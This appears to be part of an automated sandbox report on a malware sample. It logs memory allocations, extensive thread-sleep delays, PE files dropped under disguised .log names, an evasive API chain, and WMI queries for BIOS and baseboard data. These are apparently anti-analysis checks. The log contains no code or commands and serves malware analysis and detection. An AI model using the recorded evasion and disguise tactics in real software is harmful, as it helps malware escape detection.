Source: C:\Recovery\uAsLgsGzSk.exe Memory allocated: 2E70000 memory reserve | memory write watch
Source: C:\Recovery\uAsLgsGzSk.exe Memory allocated: 1B0D0000 memory reserve | memory write watch
Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe Memory allocated: 2E20000 memory reserve | memory write watch
Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe Memory allocated: 1B010000 memory reserve | memory write watch
Source: C:\HyperWebbroker\serverBrokerperfMonitor.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477  (logged 10 times)
Source: C:\Recovery\uAsLgsGzSk.exe Thread delayed: delay time: 922337203685477  (logged 2 times)
Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe Thread delayed: delay time: 600000
Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe Thread delayed: delay time: 599891
Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe Thread delayed: delay time: 599766
Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe Thread delayed: delay time: 3600000
Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe Thread delayed: delay time: 598903
Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe Thread delayed: delay time: 598266
Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe Thread delayed: delay time: 597516
Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe Thread delayed: delay time: 596985
Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe Thread delayed: delay time: 596782
Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe Thread delayed: delay time: 596625
Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe Thread delayed: delay time: 596422
Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe Thread delayed: delay time: 596266
Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe Thread delayed: delay time: 596032
Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe Thread delayed: delay time: 595844
Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe Thread delayed: delay time: 595593
Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe Thread delayed: delay time: 595369
Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe Thread delayed: delay time: 595078
Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe Thread delayed: delay time: 594891
Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe Thread delayed: delay time: 594625
Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe Thread delayed: delay time: 594360
Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe Thread delayed: delay time: 594063
Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe Thread delayed: delay time: 593860
Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe Thread delayed: delay time: 593625
Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe Thread delayed: delay time: 593328
Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe Thread delayed: delay time: 593094
Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe Thread delayed: delay time: 592750
Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe Thread delayed: delay time: 592547
Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe Thread delayed: delay time: 592094
Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe Thread delayed: delay time: 591735
Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe Thread delayed: delay time: 591504
Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe Thread delayed: delay time: 591219
Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe Thread delayed: delay time: 590953
Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe Thread delayed: delay time: 590641
Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe Thread delayed: delay time: 590203
Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe Thread delayed: delay time: 589953
Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe Thread delayed: delay time: 589516
Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe Thread delayed: delay time: 589000
Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe Thread delayed: delay time: 588782
Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe Thread delayed: delay time: 588407
Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe Thread delayed: delay time: 588059
Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe Thread delayed: delay time: 587597
Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe Thread delayed: delay time: 587235
Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe Thread delayed: delay time: 586925
Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe Thread delayed: delay time: 586752
Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe Thread delayed: delay time: 586547
Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe Thread delayed: delay time: 586384
Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe Thread delayed: delay time: 586219
Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe Thread delayed: delay time: 300000
Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe Thread delayed: delay time: 586051
Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe Thread delayed: delay time: 585885
Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe Thread delayed: delay time: 585719
Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe Thread delayed: delay time: 585532
Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe Thread delayed: delay time: 585356
Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe Thread delayed: delay time: 585192
Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe Thread delayed: delay time: 585047
Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe Thread delayed: delay time: 584875
Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe Thread delayed: delay time: 584688
Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe Thread delayed: delay time: 584485
Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe Thread delayed: delay time: 584321
Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe Thread delayed: delay time: 584150
Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe Thread delayed: delay time: 584000
Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe Thread delayed: delay time: 583846
Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe Thread delayed: delay time: 583684
Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe Thread delayed: delay time: 583573
Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe Thread delayed: delay time: 583438
Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe Thread delayed: delay time: 583282
Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe Thread delayed: delay time: 583146
Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe Thread delayed: delay time: 583015
Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe Thread delayed: delay time: 582905
Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe Thread delayed: delay time: 582797
Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe Thread delayed: delay time: 582687
Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe Thread delayed: delay time: 582578
Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe Thread delayed: delay time: 582461
Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe Thread delayed: delay time: 582348
Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe Thread delayed: delay time: 582219
Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe Thread delayed: delay time: 582091
Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe Thread delayed: delay time: 581966
Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe Thread delayed: delay time: 581859
Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe Thread delayed: delay time: 581749
Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe Thread delayed: delay time: 581641
Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe Thread delayed: delay time: 581531
Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe Thread delayed: delay time: 581422
Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe Thread delayed: delay time: 581313
Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe Thread delayed: delay time: 581203
Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe Thread delayed: delay time: 581094
Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe Thread delayed: delay time: 580969
Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe Thread delayed: delay time: 580860
Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe Thread delayed: delay time: 580735
Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe Thread delayed: delay time: 580625
Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe Thread delayed: delay time: 580516
Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe Thread delayed: delay time: 580391
Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe Thread delayed: delay time: 580272
Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe Thread delayed: delay time: 580103
Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe Thread delayed: delay time: 579997
Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe Thread delayed: delay time: 579884
Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe Thread delayed: delay time: 579779
Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe Thread delayed: delay time: 579672
Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe Thread delayed: delay time: 579563
Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe Thread delayed: delay time: 579453
Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe Thread delayed: delay time: 579324
Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe Thread delayed: delay time: 579219
Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe Thread delayed: delay time: 579094
Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe Thread delayed: delay time: 578983
Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe Thread delayed: delay time: 578874
Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe Thread delayed: delay time: 578766
Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe Thread delayed: delay time: 578641
Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe Thread delayed: delay time: 578529
Source: C:\Windows\SysWOW64\wscript.exe Window found: window name: WSH-Timer
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4913
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4416
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4536
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4104
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3992
Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe Window / User API: threadDelayed 5158
Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe Window / User API: threadDelayed 4236
Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe Dropped PE file which has not been started: C:\Users\user\Desktop\htcPaTVC.log
Source: C:\HyperWebbroker\serverBrokerperfMonitor.exe Dropped PE file which has not been started: C:\Users\user\Desktop\IitSDvGY.log
Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe Dropped PE file which has not been started: C:\Users\user\Desktop\CvvLBlqK.log
Source: C:\HyperWebbroker\serverBrokerperfMonitor.exe Dropped PE file which has not been started: C:\Users\user\Desktop\zHJVyCcw.log
Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe Dropped PE file which has not been started: C:\Users\user\Desktop\LqKTzAAu.log
Source: C:\HyperWebbroker\serverBrokerperfMonitor.exe Dropped PE file which has not been started: C:\Users\user\Desktop\qeoNTMEG.log
Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe Dropped PE file which has not been started: C:\Users\user\Desktop\FyhuXVvF.log
Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe Dropped PE file which has not been started: C:\Users\user\Desktop\eIxzTFKJ.log
Source: C:\HyperWebbroker\serverBrokerperfMonitor.exe Dropped PE file which has not been started: C:\Users\user\Desktop\hnxxzxgb.log
Source: C:\HyperWebbroker\serverBrokerperfMonitor.exe Dropped PE file which has not been started: C:\Users\user\Desktop\JwbtnRPV.log
Source: C:\HyperWebbroker\serverBrokerperfMonitor.exe Dropped PE file which has not been started: C:\Users\user\Desktop\vJjMMWBx.log
Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe Dropped PE file which has not been started: C:\Users\user\Desktop\QdcRcxPi.log
Source: C:\HyperWebbroker\serverBrokerperfMonitor.exe Dropped PE file which has not been started: C:\Users\user\Desktop\maPwcuvP.log
Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe Dropped PE file which has not been started: C:\Users\user\Desktop\mlFoDzaq.log
Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe Dropped PE file which has not been started: C:\Users\user\Desktop\GvICsVKA.log
Source: C:\HyperWebbroker\serverBrokerperfMonitor.exe Dropped PE file which has not been started: C:\Users\user\Desktop\NVLRgsWM.log
Source: C:\HyperWebbroker\serverBrokerperfMonitor.exe Dropped PE file which has not been started: C:\Users\user\Desktop\zIxCDFUn.log
Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe Dropped PE file which has not been started: C:\Users\user\Desktop\vPOensqX.log
Source: C:\HyperWebbroker\serverBrokerperfMonitor.exe Dropped PE file which has not been started: C:\Users\user\Desktop\cIDyHnkk.log
Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe Dropped PE file which has not been started: C:\Users\user\Desktop\qTMMgMAe.log
Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe Dropped PE file which has not been started: C:\Users\user\Desktop\xRAMIbuT.log
                                    Source: C:\HyperWebbroker\serverBrokerperfMonitor.exeDropped PE file which has not been started: C:\Users\user\Desktop\HupKRiKa.logJump to dropped file
Source: C:\Users\user\Desktop\hz7DzW2Yop.exe | Evasive API call chain: GetLocalTime,DecisionNodes (graph_0-23776)
Source: C:\HyperWebbroker\serverBrokerperfMonitor.exe TID: 7628 | Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5664 | Thread sleep count: 4913 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7480 | Thread sleep time: -2767011611056431s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5772 | Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2132 | Thread sleep count: 4416 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7484 | Thread sleep time: -5534023222112862s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6832 | Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1068 | Thread sleep count: 4536 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2128 | Thread sleep time: -2767011611056431s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5000 | Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7240 | Thread sleep count: 4104 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7488 | Thread sleep time: -2767011611056431s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3620 | Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7340 | Thread sleep count: 3992 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4444 | Thread sleep time: -3689348814741908s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6600 | Thread sleep time: -922337203685477s >= -30000s
Source: C:\Recovery\uAsLgsGzSk.exe TID: 7900 | Thread sleep time: -922337203685477s >= -30000s
Source: C:\Recovery\uAsLgsGzSk.exe TID: 3336 | Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe TID: 7868 | Thread sleep time: -30000s >= -30000s
Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe TID: 1852 | Thread sleep time: -33204139332677172s >= -30000s
Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe TID: 1852 | Thread sleep time: -600000s >= -30000s
Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe TID: 1852 | Thread sleep time: -599891s >= -30000s
Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe TID: 1852 | Thread sleep time: -599766s >= -30000s
Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe TID: 1608 | Thread sleep time: -39600000s >= -30000s
Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe TID: 1852 | Thread sleep time: -598903s >= -30000s
Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe TID: 1852 | Thread sleep time: -598266s >= -30000s
Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe TID: 1852 | Thread sleep time: -597516s >= -30000s
Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe TID: 1852 | Thread sleep time: -596985s >= -30000s
Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe TID: 1852 | Thread sleep time: -596782s >= -30000s
Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe TID: 1852 | Thread sleep time: -596625s >= -30000s
Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe TID: 1852 | Thread sleep time: -596422s >= -30000s
Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe TID: 1852 | Thread sleep time: -596266s >= -30000s
Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe TID: 1852 | Thread sleep time: -596032s >= -30000s
Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe TID: 1852 | Thread sleep time: -595844s >= -30000s
Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe TID: 1852 | Thread sleep time: -595593s >= -30000s
Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe TID: 1852 | Thread sleep time: -595369s >= -30000s
Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe TID: 1852 | Thread sleep time: -595078s >= -30000s
Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe TID: 1852 | Thread sleep time: -594891s >= -30000s
Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe TID: 1852 | Thread sleep time: -594625s >= -30000s
Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe TID: 1852 | Thread sleep time: -594360s >= -30000s
Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe TID: 1852 | Thread sleep time: -594063s >= -30000s
Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe TID: 1852 | Thread sleep time: -593860s >= -30000s
Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe TID: 1852 | Thread sleep time: -593625s >= -30000s
Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe TID: 1852 | Thread sleep time: -593328s >= -30000s
Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe TID: 1852 | Thread sleep time: -593094s >= -30000s
Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe TID: 1852 | Thread sleep time: -592750s >= -30000s
Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe TID: 1852 | Thread sleep time: -592547s >= -30000s
Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe TID: 1852 | Thread sleep time: -592094s >= -30000s
Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe TID: 1852 | Thread sleep time: -591735s >= -30000s
Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe TID: 1852 | Thread sleep time: -591504s >= -30000s
Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe TID: 1852 | Thread sleep time: -591219s >= -30000s
Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe TID: 1852 | Thread sleep time: -590953s >= -30000s
Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe TID: 1852 | Thread sleep time: -590641s >= -30000s
Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe TID: 1852 | Thread sleep time: -590203s >= -30000s
Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe TID: 1852 | Thread sleep time: -589953s >= -30000s
Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe TID: 1852 | Thread sleep time: -589516s >= -30000s
Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe TID: 1852 | Thread sleep time: -589000s >= -30000s
Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe TID: 1852 | Thread sleep time: -588782s >= -30000s
Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe TID: 1852 | Thread sleep time: -588407s >= -30000s
Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe TID: 1852 | Thread sleep time: -588059s >= -30000s
Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe TID: 1852 | Thread sleep time: -587597s >= -30000s
Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe TID: 1852 | Thread sleep time: -587235s >= -30000s
Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe TID: 1852 | Thread sleep time: -586925s >= -30000s
Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe TID: 1852 | Thread sleep time: -586752s >= -30000s
Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe TID: 1852 | Thread sleep time: -586547s >= -30000s
Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe TID: 1852 | Thread sleep time: -586384s >= -30000s
Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe TID: 1852 | Thread sleep time: -586219s >= -30000s
Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe TID: 1608 | Thread sleep time: -600000s >= -30000s
Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe TID: 1852 | Thread sleep time: -586051s >= -30000s
Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe TID: 1852 | Thread sleep time: -585885s >= -30000s
Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe TID: 1852 | Thread sleep time: -585719s >= -30000s
Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe TID: 1852 | Thread sleep time: -585532s >= -30000s
Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe TID: 1852 | Thread sleep time: -585356s >= -30000s
Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe TID: 1852 | Thread sleep time: -585192s >= -30000s
Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe TID: 1852 | Thread sleep time: -585047s >= -30000s
Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe TID: 1852 | Thread sleep time: -584875s >= -30000s
Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe TID: 1852 | Thread sleep time: -584688s >= -30000s
Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe TID: 1852 | Thread sleep time: -584485s >= -30000s
Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe TID: 1852 | Thread sleep time: -584321s >= -30000s
Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe TID: 1852 | Thread sleep time: -584150s >= -30000s
Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe TID: 1852 | Thread sleep time: -584000s >= -30000s
Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe TID: 1852 | Thread sleep time: -583846s >= -30000s
Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe TID: 1852 | Thread sleep time: -583684s >= -30000s
Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe TID: 1852 | Thread sleep time: -583573s >= -30000s
Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe TID: 1852 | Thread sleep time: -583438s >= -30000s
Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe TID: 1852 | Thread sleep time: -583282s >= -30000s
Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe TID: 1852 | Thread sleep time: -583146s >= -30000s
Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe TID: 1852 | Thread sleep time: -583015s >= -30000s
Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe TID: 1852 | Thread sleep time: -582905s >= -30000s
Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe TID: 1852 | Thread sleep time: -582797s >= -30000s
Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe TID: 1852 | Thread sleep time: -582687s >= -30000s
Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe TID: 1852 | Thread sleep time: -582578s >= -30000s
Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe TID: 1852 | Thread sleep time: -582461s >= -30000s
Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe TID: 1852 | Thread sleep time: -582348s >= -30000s
Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe TID: 1852 | Thread sleep time: -582219s >= -30000s
Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe TID: 1852 | Thread sleep time: -582091s >= -30000s
Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe TID: 1852 | Thread sleep time: -581966s >= -30000s
Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe TID: 1852 | Thread sleep time: -581859s >= -30000s
Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe TID: 1852 | Thread sleep time: -581749s >= -30000s
Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe TID: 1852 | Thread sleep time: -581641s >= -30000s
Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe TID: 1852 | Thread sleep time: -581531s >= -30000s
Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe TID: 1852 | Thread sleep time: -581422s >= -30000s
Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe TID: 1852 | Thread sleep time: -581313s >= -30000s
Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe TID: 1852 | Thread sleep time: -581203s >= -30000s
Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe TID: 1852 | Thread sleep time: -581094s >= -30000s
Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe TID: 1852 | Thread sleep time: -580969s >= -30000s
Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe TID: 1852 | Thread sleep time: -580860s >= -30000s
Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe TID: 1852 | Thread sleep time: -580735s >= -30000s
Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe TID: 1852 | Thread sleep time: -580625s >= -30000s
Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe TID: 1852 | Thread sleep time: -580516s >= -30000s
Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe TID: 1852 | Thread sleep time: -580391s >= -30000s
Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe TID: 1852 | Thread sleep time: -580272s >= -30000s
Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe TID: 1852 | Thread sleep time: -580103s >= -30000s
Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe TID: 1852 | Thread sleep time: -579997s >= -30000s
Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe TID: 1852 | Thread sleep time: -579884s >= -30000s
Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe TID: 1852 | Thread sleep time: -579779s >= -30000s
Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe TID: 1852 | Thread sleep time: -579672s >= -30000s
Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe TID: 1852 | Thread sleep time: -579563s >= -30000s
Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe TID: 1852 | Thread sleep time: -579453s >= -30000s
Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe TID: 1852 | Thread sleep time: -579324s >= -30000s
Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe TID: 1852 | Thread sleep time: -579219s >= -30000s
Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe TID: 1852 | Thread sleep time: -579094s >= -30000s
Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe TID: 1852 | Thread sleep time: -578983s >= -30000s
Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe TID: 1852 | Thread sleep time: -578874s >= -30000s
Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe TID: 1852 | Thread sleep time: -578766s >= -30000s
Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe TID: 1852 | Thread sleep time: -578641s >= -30000s
Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe TID: 1852 | Thread sleep time: -578529s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 4600 | Thread sleep time: -30000s >= -30000s
Source: C:\Windows\System32\svchost.exe | File opened: PhysicalDrive0
Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe | WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BaseBoard
Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe | WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BIOS
